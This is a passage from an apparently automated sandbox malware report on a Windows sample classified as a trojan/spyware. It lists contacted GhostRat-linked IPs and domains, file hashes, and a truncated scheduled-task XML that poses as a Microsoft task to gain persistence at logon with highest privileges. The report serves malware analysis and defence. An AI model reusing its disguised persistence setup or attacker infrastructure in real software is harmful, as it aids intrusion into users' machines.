                                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.microsoft.qpowershell.exe, 00000003.00000002.1725044947.0000000007DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://sectigo.com/CPS0HGwpjJUqhW.exefalse
                                                                        		high
                                                                        https://yybadaccess.3g.qq.com/pc_yyb_client/pcyyb_get_app_detailpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                          		high
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.00000000033E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://curl.se/docs/http-cookies.htmlpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1712398969.0000000004586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.00000000033E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://go.micropowershell.exe, 00000008.00000002.1755109484.000000000571A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.00000000054F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005A63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contoso.com/Iconpowershell.exe, 00000013.00000002.2042669213.000000000639A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#HGwpjJUqhW.exefalse
                                                                                        		high
                                                                                        https://curl.se/docs/alt-svc.htmlpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                                          		high
                                                                                          https://sj.qq.com/pcsem/download?supply_id=2700200680&ocpc=0&landing_type=pcyyb&keyword_id=172610888HGwpjJUqhW.exe, 00000000.00000002.2094122035.00000000038BC000.00000004.00000010.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                                            		high
                                                                                            https://yybadaccess.3g.qq.com/pcyybopen/pcyyb_recallpc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                                              		high
                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2017790837.00000000033E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tHGwpjJUqhW.exefalse
                                                                                                  		high
                                                                                                  https://yybadaccess.sparta.html5.qq.com/pcyybopen/pcyyb_recallhttps://yybadaccess.3g.qq.com/pcyybopepc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crl.microopowershell.exe, 00000008.00000002.1779750961.00000000074F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crl.microlpowershell.exe, 00000008.00000002.1786185613.00000000083CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crl.micropowershell.exe, 00000014.00000002.2008946205.00000000009BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yHGwpjJUqhW.exefalse
                                                                                                      		high
                                                                                                      https://ion=v4.5powershell.exe, 0000000B.00000002.1806516664.000000000701C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#HGwpjJUqhW.exefalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1712398969.0000000004586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1755109484.0000000004F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2020722103.0000000005486000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.incredibuild.comHGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            118.107.44.219
                                                                                                            		unknownSingapore
                                                                                                            		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                            47.79.48.211
                                                                                                            		bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comUnited States
                                                                                                            		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1584088
                                                                                                            Start date and time:2025-01-04 05:37:23 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 43s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:22
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:HGwpjJUqhW.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:e60b3fe4e29a9ea4ba95fc3d951d63e90adc05b2a362234669bbd56292197547.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@29/29@1/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 50%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 65%
                                                                                                            • Number of executed functions: 186
                                                                                                            • Number of non-executed functions: 197
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                            Warnings

                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3696 because it is empty
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7744 because it is empty
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            23:38:16API Interceptor46x Sleep call for process: powershell.exe modified
                                                                                                            23:38:46API Interceptor3546989x Sleep call for process: HGwpjJUqhW.exe modified

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            118.107.44.219zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                              QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                  MEuu1a2o6n.exeGet hashmaliciousGhostRatBrowse
                                                                                                                    OdiHmn3pRK.exeGet hashmaliciousUnknownBrowse
                                                                                                                      47.79.48.211zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                        QQyisSetups64.exeGet hashmaliciousGhostRatBrowse

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comzhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 47.79.48.211

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          BCPL-SGBGPNETGlobalASNSGvYeaC4s9zP.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 27.124.4.60
                                                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 134.122.133.80
                                                                                                                          BrSgiTp1iH.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 134.122.135.95
                                                                                                                          http://smbc.usobd.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 134.122.128.92
                                                                                                                          zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                          • 118.107.44.219
                                                                                                                          017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 27.124.34.140
                                                                                                                          Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                          • 202.79.169.178
                                                                                                                          KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                          • 143.92.60.116
                                                                                                                          Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                          • 118.107.45.13
                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 118.107.44.219
                                                                                                                          VODAFONE-TRANSIT-ASVodafoneNZLtdNZ1731043030539.exeGet hashmaliciousReflectiveLoaderBrowse
                                                                                                                          • 47.76.199.218
                                                                                                                          armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.78.236.90
                                                                                                                          botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 49.226.28.57
                                                                                                                          zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 47.78.183.235
                                                                                                                          armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 49.227.11.95
                                                                                                                          nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 121.74.237.200
                                                                                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 121.75.40.91
                                                                                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 47.78.236.95

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          37f463bf4616ecd445d4a1937da06e19http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          adguardInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          adguardVPNInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.79.48.211
                                                                                                                          Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                          • 47.79.48.211

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pc_yyb_2700200680_installer[1].exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7460336
                                                                                                                          Entropy (8bit):6.57889960952563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:196608:drEqXU8HMTs3juh96tfMcQPlQ+02cju5ehsV6ytfueau:7XU8YVVVuS
                                                                                                                          MD5:9DEE6F9C41488F78CC867C028EA58199
                                                                                                                          SHA1:A3D7F0D74AC5256FA04D529A754F01A4178161F3
                                                                                                                          SHA-256:B96B4DAA7ED00F2F5F54890988BB07AFC5B7DA9481B068CF8CC2CD2D91A7D54E
                                                                                                                          SHA-512:5D3F4303CB54A07335D6EE3FE80C8C7808811B90C7B9C5A91CCDCE13BA4D80D793F0F23750EE75B16B78A288CCAA19328B7ADBB785BF7ADE2900ADA68C039C68
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$.........ydL..7L..7L..7X..6X..7X..6...7...6_..7...6F..7...68..7*..7F..7X..6O..7X..6e..7X..6N..7L..7]..7..6...7...6E..7...6n..7...6M..7...6?..7...6w..7X..6a..7L..7...7...6...7...6M..7...7M..7L..7M..7...6M..7RichL..7........................PE..d.....Gg.........."......$<...5.......6........@.............................Pr......$r...`.........................................@@M.@....JM.......T.......Q.......q..U....q.......H.T.....................H.(.....H.8............@<..............................text...\"<......$<................. ..`.rdata...O...@<..P...(<.............@..@.data....Q....M......xM.............@....pdata........Q......^Q.............@..@_RDATA........T.......S.............@..@.QMGuid. .....T.......S.............@....rsrc.........T.......S.............@..@.reloc........q.......p.............@..B........................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):1.1510207563435464
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:NlllulfkT/Z:NllUMT
                                                                                                                          MD5:D4FA57E524AF6F31660A084960CF6589
                                                                                                                          SHA1:28936BB37DAA2328742AA1B48F0DB33565DB5A07
                                                                                                                          SHA-256:6C8D419DBFA43F3540145F767A34D6F90487339EA5B5E150A6BA771EBA0593D4
                                                                                                                          SHA-512:2A35319EFC241394638E7BE9E1BE44FCB5F2F51F1FA21A5E3F80FC61B989B4D1C5E2A64959D799E9ACB453936CF9028FC2DB64357B1BEE9DB1F0822CE8FEE432
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e................................................@..........

                                                                                                                          C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1893
                                                                                                                          Entropy (8bit):5.212287775015203
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                                                                          C:\Users\user\AppData\Local\Temp\PolicyManagement.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):5.172564010951281
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ck5XzDlybXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:75XzDlybGQhFdOFQOzBdKrKsTLXbV
                                                                                                                          MD5:A16DD00D191DC2FC881634D7DEE2026C
                                                                                                                          SHA1:53A373DC6DA7CA186695CCCB9BF3CFC205C45C58
                                                                                                                          SHA-256:27CD089F35A3AB92614414C0788900BC64C637B2FC011858932F335C88FEF23D
                                                                                                                          SHA-512:F430EB5753C428D3473485217865F9BC8C16804C211A2788E3B90D6F9CE499BF0842EB35A4519AD5223741348E4AB47F80A4F13004D5EE9B2CD0322B75E82264
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\.Net OneStart</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers />. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>.

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qlnfm4k.hjq.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mv2apj5.zrz.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xqg5ysm.i01.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by13yzy4.qxa.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czpfjzy1.l1l.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwl552hu.yse.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikthijdh.riw.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kq4fb1x4.yh2.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
